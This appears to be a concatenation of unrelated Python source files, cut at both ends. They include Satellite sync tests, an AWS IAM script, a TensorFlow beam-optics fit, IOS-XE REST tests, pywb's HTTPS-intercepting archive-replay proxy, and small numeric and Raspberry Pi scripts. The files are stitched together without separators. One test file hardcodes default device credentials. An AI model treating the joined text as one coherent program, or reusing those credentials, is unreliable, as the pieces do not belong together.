        for distro_name, repository in zip([DISTRO_RHEL7, DISTRO_RHEL6], repositories)
    ]
    for collection in collections:
        collection.setup(module_org_with_manifest.id, synchronize=False)
    # Build the (product, releasever, arch, name) path tuples the Sync Status
    # page expects for Red Hat repositories.
    sync_paths = []
    for repository in repositories:
        data = repository.repo_data
        sync_paths.append(
            (data['product'], data.get('releasever'), data.get('arch'), data['name'])
        )
    with session:
        session.organization.select(org_name=module_org_with_manifest.name)
        sync_results = session.sync_status.synchronize(sync_paths)
        assert len(sync_results) == len(sync_paths)
        assert all([result == 'Syncing Complete.' for result in sync_results])


@skip_if_bug_open('bugzilla', 1625783)
@skip_if_os('RHEL6')
@tier2
@upgrade
def test_positive_sync_custom_ostree_repo(session, module_custom_product):
    """Create custom ostree repository and sync it.

    :id: e4119b9b-0356-4661-a3ec-e5807224f7d2

    :expectedresults: ostree repo should be synced successfully

    :CaseLevel: Integration
    """
    repo = entities.Repository(
        content_type='ostree',
        url=FEDORA27_OSTREE_REPO,
        product=module_custom_product,
        unprotected=False,
    ).create()
    with session:
        # Sync from the UI and expect a single completed result.
        results = session.sync_status.synchronize([
            (module_custom_product.name, repo.name)])
        assert len(results) == 1
        assert results[0] == 'Syncing Complete.'


@run_in_one_thread
@skip_if_bug_open('bugzilla', 1625783)
@skip_if_os('RHEL6')
@skip_if_not_set('fake_manifest')
@tier2
@upgrade
def test_positive_sync_rh_ostree_repo(session, module_org_with_manifest):
    """Sync CDN based ostree repository.

    :id: 4d28fff0-5fda-4eee-aa0c-c5af02c31de5

    :Steps:
        1. Import a valid manifest
        2. Enable the OStree repo and sync it

    :expectedresults: ostree repo should be synced successfully from CDN

    :CaseLevel: Integration
    """
    # Enable the Atomic Host OStree repo in the manifest org before syncing.
    enable_rhrepo_and_fetchid(
        basearch=None,
        org_id=module_org_with_manifest.id,
        product=PRDS['rhah'],
        repo=REPOS['rhaht']['name'],
        reposet=REPOSET['rhaht'],
        releasever=None,
    )
    with session:
        session.organization.select(org_name=module_org_with_manifest.name)
        results = session.sync_status.synchronize([
            (PRDS['rhah'], REPOS['rhaht']['name'])])
        assert len(results) == 1
        assert results[0] == 'Syncing Complete.'


@tier2
@upgrade
def test_positive_sync_docker_via_sync_status(session, module_org):
    """Create custom docker repo and sync it via the sync status page.

    :id: 00b700f4-7e52-48ed-98b2-e49b3be102f2

    :expectedresults: Sync procedure for specific docker repository is
        successful

    :CaseLevel: Integration
    """
    product = entities.Product(organization=module_org).create()
    repo_name = gen_string('alphanumeric')
    with session:
        # Create the docker repository through the UI rather than the API so
        # the whole flow under test happens in the web interface.
        session.repository.create(
            product.name,
            {'name': repo_name,
             'repo_type': REPO_TYPE['docker'],
             'repo_content.upstream_url': DOCKER_REGISTRY_HUB,
             'repo_content.upstream_repo_name': DOCKER_UPSTREAM_NAME}
        )
        assert session.repository.search(product.name, repo_name)[0]['Name'] == repo_name
        result = session.sync_status.synchronize([(product.name, repo_name)])
        assert result[0] == 'Syncing Complete.'

#!/usr/bin/env python

from keyring import get_password
from boto.iam.connection import IAMConnection
import lib.LoadBotoConfig as BotoConfig

from sys import exit

# Environments whose IAM console sign-in URLs should be printed.
envs = ['dev', 'qa', 'staging', 'demo', 'prod']

for env in envs:
    # Read the access key id from the per-environment boto config; the secret
    # is kept in the OS keyring, never in the config file.
    # (Renamed from `id`, which shadowed the builtin of the same name.)
    access_key_id = BotoConfig.config.get(env, 'aws_access_key_id')
    secret_key = get_password(BotoConfig.config.get(env, 'keyring'), access_key_id)

    conn = IAMConnection(aws_access_key_id=access_key_id, aws_secret_access_key=secret_key)

    print(conn.get_signin_url())
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 13:37:16 2017
Author: Peiyong Jiang : jiangpeiyong@impcas.ac.cn
Function:
    Rotate the phase-space distribution so that the x-x' correlation vanishes.
    

"""


import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np



plt.close('all')

# Twiss parameters describing the initial, tilted phase-space ellipse.
emitX = 12
alphaX = -10.
betaX = 13.
gammaX = (1. + alphaX**2)/betaX

# Beam sigma (covariance) matrix: [[beta, -alpha], [-alpha, gamma]] * emittance.
sigmaX = np.array([[betaX, -alphaX], [-alphaX, gammaX]])*emitX

numPart = np.int32(1e5)
# Sample particles (x, x') from the correlated Gaussian; shape (2, numPart).
X = np.random.multivariate_normal([0., 0.], sigmaX, numPart).T

plt.figure(1)
plt.plot(X[0, :], X[1, :], '.')

##

# Single trainable rotation angle w; P is the 2x2 rotation matrix built from it.
w = tf.Variable(tf.random_normal([1, 1]))
w1 = tf.cos(w)
w2 = tf.sin(w)

P_Row_1 = tf.concat([w1, -w2], 0)

P_Row_2 = tf.concat([w2, w1], 0)

P = tf.concat([P_Row_1, P_Row_2], 1)

# Input particles (2, N) and their rotated image.
xI = tf.placeholder(tf.float32, [2, None])

xO = tf.matmul(P, xI)

# <x * x'> of the rotated beam -- zero when the ellipse is upright, so
# minimizing its square finds the rotation removing the x-x' correlation.
xxp = tf.reduce_mean(xO[0]*xO[1])

lossAlpha = xxp**2

rateLearn = 1e-4
optTotal = tf.train.AdamOptimizer(rateLearn)
trainAlpha = optTotal.minimize(lossAlpha)

sess = tf.InteractiveSession(config=tf.ConfigProto(log_device_placement=True))

sess.run(tf.global_variables_initializer())

sizeBatch = 64

# BUG FIX: xrange() is Python 2 only and raises NameError on Python 3 --
# use range() instead.
for _ in range(8000):
    # Train on a random contiguous mini-batch of particles.
    startBatch = np.random.randint(0, high=numPart-sizeBatch-1)
    xFeed = X[:, startBatch:startBatch+sizeBatch:]

    sess.run(trainAlpha, feed_dict={xI: xFeed})

    #print(sess.run(LambdaR))
    #print('---------------------------')
    print(sess.run(lossAlpha, feed_dict={xI: X}), _)
    print('_______________________________________________')

zReal = sess.run(xO, feed_dict={xI: X})

plt.figure(2)
plt.plot(zReal[0, :], zReal[1, :], 'r.')
plt.axis('equal')

# BUG FIX: the bare `plt.hold` attribute accesses were dropped -- pyplot.hold
# was deprecated in matplotlib 2.0 and removed in 3.0 (overlaying is the
# default behaviour of repeated plot() calls on the same figure anyway).
plt.figure(10)
plt.plot(zReal[0, :], zReal[1, :], 'r.')
plt.plot(X[0, :], X[1, :], 'b.')
#plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.axis('equal')

plt.figure(11)
#plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.plot(X[0, :], X[1, :], 'b.')
plt.plot(zReal[0, :], zReal[1, :], 'r.')
plt.axis('equal')

# Emittance of the rotated beam: sqrt(det(cov)); invariant under rotation,
# so it should reproduce emitX up to sampling noise.
zRealCov = np.cov(zReal)
emitXReal = np.sqrt(np.linalg.det(zRealCov))

print(emitXReal)



import threading
import asyncio

async def hello():
    """Print a greeting, yield to the event loop for a second, then print
    again -- demonstrates both coroutines interleaving on one thread."""
    # BUG FIX: threading.currentThread() was deprecated and removed in
    # Python 3.12; use the snake_case threading.current_thread() instead.
    # It returns the same Thread object, so the printed output is unchanged.
    print('Hello world! (%s)' % threading.current_thread())
    await asyncio.sleep(1)
    print('Hello again! (%s)' % threading.current_thread())

# BUG FIX: asyncio.get_event_loop() + run_until_complete is the legacy
# (pre-3.7) way to drive coroutines and is deprecated; asyncio.wait() also
# no longer accepts bare coroutine objects. asyncio.run() creates, runs and
# closes the loop in one call; gather() fans out the two coroutines.
async def _main():
    await asyncio.gather(hello(), hello())

asyncio.run(_main())
"""
Tests are performed against csr1000v-universalk9.03.15.00.S.155-2.S-std.
"""
import unittest

from iosxe.iosxe import IOSXE
from iosxe.exceptions import AuthError

# Connection details of the lab CSR1000v under test; the tests below require
# live network access to this device.
node = '172.16.92.134'
username = 'cisco'
password = 'cisco'
port = 55443


class TestIOSXE(unittest.TestCase):
    """Integration tests for the IOSXE REST client, run against a live
    CSR1000v instance (see the module-level connection constants)."""

    def setUp(self):
        # Fresh client per test; self-signed certificate warnings silenced.
        self.xe = IOSXE(node=node, username=username, password=password, disable_warnings=True)

    def test_iosxe_is_a_IOSXE(self):
        self.assertIsInstance(self.xe, IOSXE)

    def test_invalid_user_pass_returns_auth_error(self):

        # Bad credentials must surface as AuthError from the constructor.
        self.assertRaises(AuthError, IOSXE, node=node, username='stuff', password='things',
                          disable_warnings=True)

    def test_url_base(self):
        self.assertEqual(self.xe.url_base, 'https://{0}:{1}/api/v1'.format(node, port))

    def test_token_uri(self):
        self.assertEqual(self.xe.token_uri, '/auth/token-services')

    def test_save_config_success(self):
        # 204 No Content indicates the running config was saved.
        resp = self.xe.save_config()
        self.assertEqual(204, resp.status_code)


from __future__ import absolute_import

from pywb.framework.wbrequestresponse import WbResponse, WbRequest
from pywb.framework.archivalrouter import ArchivalRouter

from six.moves.urllib.parse import urlsplit
import base64

import socket
import ssl

from io import BytesIO

from pywb.rewrite.url_rewriter import SchemeOnlyUrlRewriter, UrlRewriter
from pywb.rewrite.rewrite_content import RewriteContent
from pywb.utils.wbexception import BadRequestException

from pywb.utils.bufferedreaders import BufferedReader
from pywb.utils.loaders import to_native_str

from pywb.framework.proxy_resolvers import ProxyAuthResolver, CookieResolver, IPCacheResolver

from tempfile import SpooledTemporaryFile


#=================================================================
class ProxyArchivalRouter(ArchivalRouter):
    """
    Router layering http-proxy-mode handling on top of archival routing:
    every request is first offered to a ProxyRouter, and only requests
    the proxy declines fall through to the regular archival routes.
    """
    def __init__(self, routes, **kwargs):
        super(ProxyArchivalRouter, self).__init__(routes, **kwargs)
        self.proxy = ProxyRouter(routes, **kwargs)

    def __call__(self, env):
        # The proxy wins when it produces a truthy response; otherwise defer
        # to the archival router; otherwise signal "unhandled" with None.
        return (self.proxy(env) or
                super(ProxyArchivalRouter, self).__call__(env) or
                None)


#=================================================================
class ProxyRouter(object):
    """
    A router which supports http proxy mode requests
    Handles requests of the form: GET http://example.com

    The router returns latest capture by default.
    However, if Memento protocol support is enabled,
    the memento Accept-Datetime header can be used
    to select specific capture.
    See: http://www.mementoweb.org/guide/rfc/#Pattern1.3
    for more details.
    """

    BLOCK_SIZE = 4096
    DEF_MAGIC_NAME = 'pywb.proxy'
    BUFF_RESPONSE_MEM_SIZE = 1024*1024

    CERT_DL_PEM = '/pywb-ca.pem'
    CERT_DL_P12 = '/pywb-ca.p12'

    CA_ROOT_FILE = './ca/pywb-ca.pem'
    CA_ROOT_NAME = 'pywb https proxy replay CA'
    CA_CERTS_DIR = './ca/certs/'

    EXTRA_HEADERS = {'cache-control': 'no-cache',
                     'connection': 'close',
                     'p3p': 'CP="NOI ADM DEV COM NAV OUR STP"'}

    def __init__(self, routes, **kwargs):
        """Configure the resolver, magic hostname, extra response headers
        and (optionally) the certificate authority used for HTTPS proxying.

        Options are read from ``config['proxy_options']`` in ``kwargs``.
        """
        self.error_view = kwargs.get('error_view')

        proxy_options = kwargs.get('config', {})
        if proxy_options:
            proxy_options = proxy_options.get('proxy_options', {})

        self.magic_name = proxy_options.get('magic_name')
        if not self.magic_name:
            self.magic_name = self.DEF_MAGIC_NAME
            proxy_options['magic_name'] = self.magic_name

        self.extra_headers = proxy_options.get('extra_headers')
        if not self.extra_headers:
            self.extra_headers = self.EXTRA_HEADERS
            proxy_options['extra_headers'] = self.extra_headers

        res_type = proxy_options.get('cookie_resolver', True)
        if res_type == 'auth' or not res_type:
            self.resolver = ProxyAuthResolver(routes, proxy_options)
        elif res_type == 'ip':
            self.resolver = IPCacheResolver(routes, proxy_options)
        else:
            # default; covers res_type == True and res_type == 'cookie'
            self.resolver = CookieResolver(routes, proxy_options)

        self.use_banner = proxy_options.get('use_banner', True)
        self.use_wombat = proxy_options.get('use_client_rewrite', True)

        self.proxy_cert_dl_view = proxy_options.get('proxy_cert_download_view')

        if not proxy_options.get('enable_https_proxy'):
            self.ca = None
            return

        try:
            from certauth.certauth import CertificateAuthority
        except ImportError:  #pragma: no cover
            print('HTTPS proxy is not available as the "certauth" module ' +
                  'is not installed')
            print('Please install via "pip install certauth" ' +
                  'to enable HTTPS support')
            self.ca = None
            return

        # HTTPS Only Options
        ca_file = proxy_options.get('root_ca_file', self.CA_ROOT_FILE)

        # attempt to create the root_ca_file if doesn't exist
        # (generally recommended to create this separately)
        ca_name = proxy_options.get('root_ca_name', self.CA_ROOT_NAME)

        certs_dir = proxy_options.get('certs_dir', self.CA_CERTS_DIR)
        self.ca = CertificateAuthority(ca_file=ca_file,
                                       certs_dir=certs_dir,
                                       ca_name=ca_name)

        self.use_wildcard = proxy_options.get('use_wildcard_certs', True)

    def __call__(self, env):
        """Handle one WSGI request in proxy mode.

        Returns a WbResponse, or None when the request is not a proxy
        request (so an outer router can handle it).
        """
        is_https = (env['REQUEST_METHOD'] == 'CONNECT')
        ArchivalRouter.ensure_rel_uri_set(env)

        # for non-https requests, check non-proxy urls
        if not is_https:
            url = env['REL_REQUEST_URI']

            if not url.startswith(('http://', 'https://')):
                return None

            env['pywb.proxy_scheme'] = 'http'

        route = None
        coll = None
        matcher = None
        response = None
        ts = None

        # check resolver, for pre connect resolve
        if self.resolver.pre_connect:
            route, coll, matcher, ts, response = self.resolver.resolve(env)
            if response:
                return response

        # do connect, then get updated url
        if is_https:
            response = self.handle_connect(env)
            if response:
                return response

            url = env['REL_REQUEST_URI']
        else:
            # split absolute proxy URI into host/port/path/query env keys
            parts = urlsplit(env['REL_REQUEST_URI'])
            hostport = parts.netloc.split(':', 1)
            env['pywb.proxy_host'] = hostport[0]
            env['pywb.proxy_port'] = hostport[1] if len(hostport) == 2 else ''
            env['pywb.proxy_req_uri'] = parts.path
            if parts.query:
                env['pywb.proxy_req_uri'] += '?' + parts.query
                env['pywb.proxy_query'] = parts.query

        if self.resolver.supports_switching:
            env['pywb_proxy_magic'] = self.magic_name

        # route (static) and other resources to archival replay
        if env['pywb.proxy_host'] == self.magic_name:
            env['REL_REQUEST_URI'] = env['pywb.proxy_req_uri']

            # special case for proxy install
            response = self.handle_cert_install(env)
            if response:
                return response

            return None

        # check resolver, post connect
        if not self.resolver.pre_connect:
            route, coll, matcher, ts, response = self.resolver.resolve(env)
            if response:
                return response

        rel_prefix = ''

        custom_prefix = env.get('HTTP_PYWB_REWRITE_PREFIX', '')
        if custom_prefix:
            host_prefix = custom_prefix
            urlrewriter_class = UrlRewriter
            abs_prefix = True
            # always rewrite to absolute here
            rewrite_opts = dict(no_match_rel=True)
        else:
            host_prefix = env['pywb.proxy_scheme'] + '://' + self.magic_name
            urlrewriter_class = SchemeOnlyUrlRewriter
            abs_prefix = False
            rewrite_opts = {}

        # special case for proxy calendar
        if (env['pywb.proxy_host'] == 'query.' + self.magic_name):
            url = env['pywb.proxy_req_uri'][1:]
            rel_prefix = '/'

        if ts is not None:
            url = ts + '/' + url

        wbrequest = route.request_class(env,
                              request_uri=url,
                              wb_url_str=url,
                              coll=coll,
                              host_prefix=host_prefix,
                              rel_prefix=rel_prefix,
                              wburl_class=route.handler.get_wburl_type(),
                              urlrewriter_class=urlrewriter_class,
                              use_abs_prefix=abs_prefix,
                              rewrite_opts=rewrite_opts,
                              is_proxy=True)

        if matcher:
            route.apply_filters(wbrequest, matcher)

        # full rewrite and banner
        if self.use_wombat and self.use_banner:
            wbrequest.wb_url.mod = ''
        elif self.use_banner:
        # banner only, no rewrite
            wbrequest.wb_url.mod = 'bn_'
        else:
        # unaltered, no rewrite or banner
            wbrequest.wb_url.mod = 'uo_'

        response = route.handler(wbrequest)
        if not response:
            return None

        # add extra headers for replay responses
        if wbrequest.wb_url and wbrequest.wb_url.is_replay():
            response.status_headers.replace_headers(self.extra_headers)

        # check for content-length
        res = response.status_headers.get_header('content-length')
        try:
            if int(res) > 0:
                return response
        except (TypeError, ValueError):
            # header missing (None) or not a number -- fall through and
            # compute/transfer the length ourselves
            pass

        # need to either chunk or buffer to get content-length
        if env.get('SERVER_PROTOCOL') == 'HTTP/1.1':
            response.status_headers.remove_header('content-length')
            response.status_headers.headers.append(('Transfer-Encoding', 'chunked'))
            response.body = self._chunk_encode(response.body)
        else:
            response.body = self._buffer_response(response.status_headers,
                                                  response.body)

        return response

    @staticmethod
    def _chunk_encode(orig_iter):
        """Wrap an iterable of bytes in HTTP/1.1 chunked transfer encoding."""
        for chunk in orig_iter:
            if not len(chunk):
                continue
            chunk_len = b'%X\r\n' % len(chunk)
            yield chunk_len
            yield chunk
            yield b'\r\n'

        yield b'0\r\n\r\n'

    @staticmethod
    def _buffer_response(status_headers, iterator):
        """Buffer the full body (spilling to disk past BUFF_RESPONSE_MEM_SIZE)
        so an exact Content-Length header can be set, then re-stream it."""
        out = SpooledTemporaryFile(ProxyRouter.BUFF_RESPONSE_MEM_SIZE)
        size = 0

        for buff in iterator:
            size += len(buff)
            out.write(buff)

        content_length_str = str(size)
        # remove existing content length
        status_headers.replace_header('Content-Length',
                                      content_length_str)

        out.seek(0)
        return RewriteContent.stream_to_gen(out)

    def get_request_socket(self, env):
        """Best-effort recovery of the raw client socket from the WSGI env
        (uwsgi, gunicorn, or wsgi.input internals). None if unavailable
        or if HTTPS proxying is disabled (no CA)."""
        if not self.ca:
            return None

        sock = None

        if env.get('uwsgi.version'):  # pragma: no cover
            try:
                import uwsgi
                fd = uwsgi.connection_fd()
                conn = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
                try:
                    sock = socket.socket(_sock=conn)
                except Exception:
                    sock = conn
            except Exception:
                pass
        elif env.get('gunicorn.socket'):  # pragma: no cover
            sock = env['gunicorn.socket']

        if not sock:
            # attempt to find socket from wsgi.input
            input_ = env.get('wsgi.input')
            if input_:
                if hasattr(input_, '_sock'):  # pragma: no cover
                    raw = input_._sock
                    sock = socket.socket(_sock=raw)  # pragma: no cover
                elif hasattr(input_, 'raw'):
                    sock = input_.raw._sock

        return sock

    def handle_connect(self, env):
        """Complete a CONNECT handshake: acknowledge the tunnel, wrap the
        socket in TLS with a per-host cert, then re-parse the inner request
        line and headers back into the WSGI env.

        Returns an error WbResponse if HTTPS proxying is unsupported,
        otherwise None after mutating ``env`` in place.
        """
        sock = self.get_request_socket(env)
        if not sock:
            return WbResponse.text_response('HTTPS Proxy Not Supported',
                                            '405 HTTPS Proxy Not Supported')

        sock.send(b'HTTP/1.0 200 Connection Established\r\n')
        sock.send(b'Proxy-Connection: close\r\n')
        sock.send(b'Server: pywb proxy\r\n')
        sock.send(b'\r\n')

        hostname, port = env['REL_REQUEST_URI'].split(':')

        if not self.use_wildcard:
            certfile = self.ca.cert_for_host(hostname)
        else:
            certfile = self.ca.get_wildcard_cert(hostname)

        try:
            ssl_sock = ssl.wrap_socket(sock,
                                       server_side=True,
                                       certfile=certfile,
                                       #ciphers="ALL",
                                       suppress_ragged_eofs=False,
                                       ssl_version=ssl.PROTOCOL_SSLv23
                                       )
            env['pywb.proxy_ssl_sock'] = ssl_sock

            buffreader = BufferedReader(ssl_sock, block_size=self.BLOCK_SIZE)

            statusline = to_native_str(buffreader.readline().rstrip())

        except Exception as se:
            # str(se), not se.message: Python 3 exceptions have no .message
            raise BadRequestException(str(se))

        statusparts = statusline.split(' ')

        if len(statusparts) < 3:
            raise BadRequestException('Invalid Proxy Request: ' + statusline)

        env['REQUEST_METHOD'] = statusparts[0]
        env['REL_REQUEST_URI'] = ('https://' +
                                  env['REL_REQUEST_URI'].replace(':443', '') +
                                  statusparts[1])

        env['SERVER_PROTOCOL'] = statusparts[2].strip()

        env['pywb.proxy_scheme'] = 'https'

        env['pywb.proxy_host'] = hostname
        env['pywb.proxy_port'] = port
        env['pywb.proxy_req_uri'] = statusparts[1]

        queryparts = env['REL_REQUEST_URI'].split('?', 1)
        env['PATH_INFO'] = queryparts[0]
        env['QUERY_STRING'] = queryparts[1] if len(queryparts) > 1 else ''
        env['pywb.proxy_query'] = env['QUERY_STRING']

        # read remaining request headers into CGI-style env vars
        while True:
            line = to_native_str(buffreader.readline())
            if line:
                line = line.rstrip()

            if not line:
                break

            parts = line.split(':', 1)
            if len(parts) < 2:
                continue

            name = parts[0].strip()
            value = parts[1].strip()

            name = name.replace('-', '_').upper()

            if name not in ('CONTENT_LENGTH', 'CONTENT_TYPE'):
                name = 'HTTP_' + name

            env[name] = value

        env['wsgi.input'] = buffreader

    def handle_cert_install(self, env):
        """Serve the CA landing page and PEM/PKCS12 certificate downloads
        on the magic proxy hostname. Returns None for any other path."""
        # original tuple listed '/index.html' twice; deduplicated
        if env['pywb.proxy_req_uri'] in ('/', '/index.html'):
            available = (self.ca is not None)

            if self.proxy_cert_dl_view:
                return (self.proxy_cert_dl_view.
                         render_response(available=available,
                                         pem_path=self.CERT_DL_PEM,
                                         p12_path=self.CERT_DL_P12))

        elif env['pywb.proxy_req_uri'] == self.CERT_DL_PEM:
            if not self.ca:
                return None

            buff = b''
            with open(self.ca.ca_file, 'rb') as fh:
                buff = fh.read()

            content_type = 'application/x-x509-ca-cert'
            headers = [('Content-Length', str(len(buff)))]

            return WbResponse.bin_stream([buff],
                                         content_type=content_type,
                                         headers=headers)

        elif env['pywb.proxy_req_uri'] == self.CERT_DL_P12:
            if not self.ca:
                return None

            buff = self.ca.get_root_PKCS12()

            content_type = 'application/x-pkcs12'
            headers = [('Content-Length', str(len(buff)))]

            return WbResponse.bin_stream([buff],
                                         content_type=content_type,
                                         headers=headers)

# -*- coding: utf-8 -*-

import os
from pygal import *


def listeEuler(f, x0, y0, pas, n):
    """Return n points (x, y) approximating y' = f(x, y), y(x0) = y0,
    using the explicit Euler method with step `pas`.

    Fix: the original advanced x BEFORE evaluating f, so each step used the
    slope f(x + pas, y_old) -- neither explicit nor implicit Euler. The
    slope must be taken at the current point (x, y) before stepping.
    """
    x, y, points = x0, y0, []
    for _ in range(n):
        points.append((x, y))
        y += pas * f(x, y)
        x += pas
    return points


def euler(f, x0, y0, xf, n):
    """Approximate y' = f(x, y) over [x0, xf] in n Euler steps and render
    the resulting polyline to 'courbeEulerPython.svg' as a pygal XY chart."""
    step = (xf - x0) / n
    chart = XY()
    chart.title = "Methode d Euler"
    chart.add("Solution approchee", listeEuler(f, x0, y0, step, n))
    chart.render_to_file("courbeEulerPython.svg")

os.system("pause")

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
import argparse
import pprint

import proteindf_bridge as bridge

import logging
import logging.config


def get_rest_of_frame_molecule(frame_molecule, selected_molecule):
    """Return the part of frame_molecule that does NOT match selected_molecule."""
    matched = frame_molecule.select(bridge.Select_AtomGroup(selected_molecule))
    # '^' takes the symmetric difference; since `matched` comes from
    # frame_molecule itself, this leaves exactly the remainder.
    return frame_molecule ^ matched


def assign_rest_molecule(rest_molecule, output_atom_group,
                         model_id="model_1", chain_id="Z", res_name="UNK"):
    """Pack every atom of rest_molecule into one residue named `res_name`
    and attach it as chain `chain_id` under `output_atom_group[model_id]`."""
    residue = bridge.AtomGroup()
    residue.name = res_name
    # atom serials are 1-based within the residue
    for serial, atom in enumerate(rest_molecule.get_atom_list(), start=1):
        residue.set_atom(serial, atom)

    chain = bridge.AtomGroup()
    chain.set_group(1, residue)

    output_atom_group[model_id].set_group(chain_id, chain)


def main():
    """Restructure a target brd file so it matches a reference brd file.

    Parses the command line, loads both atom groups, runs the restructuring
    with the given matching tolerance, and saves the result.
    """
    parser = argparse.ArgumentParser(
        description='restructure brd file by reference file')
    parser.add_argument('target_brd_path',
                        nargs=1,
                        help='target brd file')
    parser.add_argument('ref_brd_path',
                        nargs=1,
                        help='reference brd file')
    parser.add_argument('-o', '--output_path',
                        nargs=1,
                        default=["output.brd"])
    parser.add_argument('-r', '--range',
                        nargs=1,
                        default=[1.0E-5])
    parser.add_argument('-v', '--verbose',
                        action='store_true',
                        default=False)
    args = parser.parse_args()

    target_brd_path = args.target_brd_path[0]
    ref_brd_path = args.ref_brd_path[0]
    output_path = args.output_path[0]
    # renamed from `range`, which shadowed the builtin of the same name
    matching_range = float(args.range[0])
    verbose = args.verbose

    if verbose:
        print("target: {}".format(target_brd_path))
        print("reference: {}".format(ref_brd_path))

    # load
    target_ag = bridge.load_atomgroup(target_brd_path)
    ref_ag = bridge.load_atomgroup(ref_brd_path)

    restructured = target_ag.restructure(ref_ag, matching_range)

    if output_path:
        if verbose:
            print("output brd file: {}".format(output_path))
        bridge.save_atomgroup(restructured, output_path)


if __name__ == '__main__':
    # Optional profiling hooks (disabled): uncomment to dump cProfile stats.
    #import cProfile
    #pr = cProfile.Profile()
    # pr.enable()
    main()
    # pr.disable()
    # pr.dump_stats('program.profile')

import RPi.GPIO as GPIO

KnockPin = 11  # physical (BOARD) pin wired to the knock/vibration sensor
LedPin = 12    # physical (BOARD) pin driving the LED (active-low: HIGH = off, see setup())

Led_status = 1  # last level written to LedPin; toggled by swLed() on each knock

def setup():
	"""Configure GPIO: LED pin as output (driven off), knock sensor as pulled-up input."""
	GPIO.setmode(GPIO.BOARD)       # Numbers GPIOs by physical location
	GPIO.setup(LedPin, GPIO.OUT)   # Set LedPin's mode is output
	GPIO.setup(KnockPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
	GPIO.output(LedPin, GPIO.HIGH) # Set LedPin high(+3.3V) to off led

def swLed(ev=None):
	"""Toggle the LED on each detected knock (GPIO event-detect callback)."""
	global Led_status
	Led_status = not Led_status
	GPIO.output(LedPin, Led_status)  # switch led status(on-->off; off-->on)
	# Fixes: (1) the original used a Python 2 print statement indented with
	# spaces in a tab-indented file (a TabError under Python 3); (2) the LED
	# is active-low (setup() drives HIGH to turn it off), so a truthy
	# Led_status means the LED is physically OFF -- the message was inverted.
	print("LED: " + ("off" if Led_status else "on"))

def loop():
	"""Register the knock callback and idle until interrupted."""
	import time  # local import: leaves the module's import block untouched
	GPIO.add_event_detect(KnockPin, GPIO.FALLING, callback=swLed, bouncetime=200) # wait for falling
	while True:
		# Sleep instead of `pass`: the original busy-waited at 100% CPU.
		# The event callback fires from GPIO's own thread either way.
		time.sleep(1)

def destroy():
	"""Turn the LED off and release all GPIO resources."""
	# The LED is active-low (setup() drives HIGH to turn it off), so HIGH --
	# not LOW as in the original -- actually extinguishes the LED here.
	GPIO.output(LedPin, GPIO.HIGH)    # led off
	GPIO.cleanup()                    # Release resource

if __name__ == '__main__':     # Program start from here
	setup()
	try:
		loop()
	except KeyboardInterrupt:  # On Ctrl+C, release GPIO resources via destroy()
		destroy()



#!/usr/bin/python
# -*- coding: utf-8 -*-

# Copyright (C) 2018  David Arroyo Menéndez

# Author: David Arroyo Menéndez <davidam@gnu.org>
# Maintainer: David Arroyo Menéndez <davidam@gnu.org>

# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.

# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING.  If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA,
# Python program to check if the input year is a leap year or not

year = 2000

# To get year (integer input) from the user
# year = int(input("Enter a year: "))

# Gregorian rule: every 4th year is leap, except century years,
# which are leap only when also divisible by 400.
if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):
    print("{0} is a leap year".format(year))
else:
    print("{0} is not a leap year".format(year))

# Copyright 2015 Allen Institute for Brain Science
# This file is part of Allen SDK.
#
# Allen SDK is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Allen SDK is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Allen SDK.  If not, see <http://www.gnu.org/licenses/>.

from allensdk.api.api import Api
import os, json
from collections import OrderedDict

class BiophysicalPerisomaticApi(Api):
    '''Client for downloading the files of a biophysical perisomatic
    neuronal model (NWB stimulus, SWC morphology, mod files and fit
    parameters) from the Allen Institute RMA api.
    '''
    _NWB_file_type = 'NWB'
    _SWC_file_type = '3DNeuronReconstruction'
    _MOD_file_type = 'BiophysicalModelDescription'
    _FIT_file_type = 'NeuronalModelParameters'

    def __init__(self, base_uri=None):
        super(BiophysicalPerisomaticApi, self).__init__(base_uri)
        # set False to skip downloading the (large) NWB stimulus files
        self.cache_stimulus = True
        self.ids = {}
        self.sweeps = []
        self.manifest = {}

    def build_rma(self, neuronal_model_id, fmt='json'):
        '''Construct a query to find all files related to a neuronal model.

        Parameters
        ----------
        neuronal_model_id : integer or string representation
            key of experiment to retrieve.
        fmt : string, optional
            json (default) or xml

        Returns
        -------
        string
            RMA query url.
        '''
        include_associations = ''.join([
            'neuronal_model_template(well_known_files(well_known_file_type)),',
            'specimen',
            '(ephys_result(well_known_files(well_known_file_type)),'
            'neuron_reconstructions(well_known_files(well_known_file_type)),',
            'ephys_sweeps),',
            'well_known_files(well_known_file_type)'])
        # %s rather than %d: the id may be a string representation,
        # as documented above ("%d" % "123" raises TypeError).
        criteria_associations = ''.join([
            ("[id$eq%s]," % (neuronal_model_id)),
            include_associations])

        return ''.join([self.rma_endpoint,
                        '/query.',
                        fmt,
                        '?q=',
                        'model::NeuronalModel,',
                        'rma::criteria,',
                        criteria_associations,
                        ',rma::include,',
                        include_associations])

    def read_json(self, json_parsed_data):
        '''Get the list of well_known_file ids from a response body
        containing nested sample,microarray_slides,well_known_files.

        Parameters
        ----------
        json_parsed_data : dict
           Response from the Allen Institute Api RMA.

        Returns
        -------
        dict
            Well known file ids, keyed by category
            ('stimulus', 'morphology', 'modfiles', 'fit').
        '''
        self.ids = {
            'stimulus': {},
            'morphology': {},
            'modfiles': {},
            'fit': {}
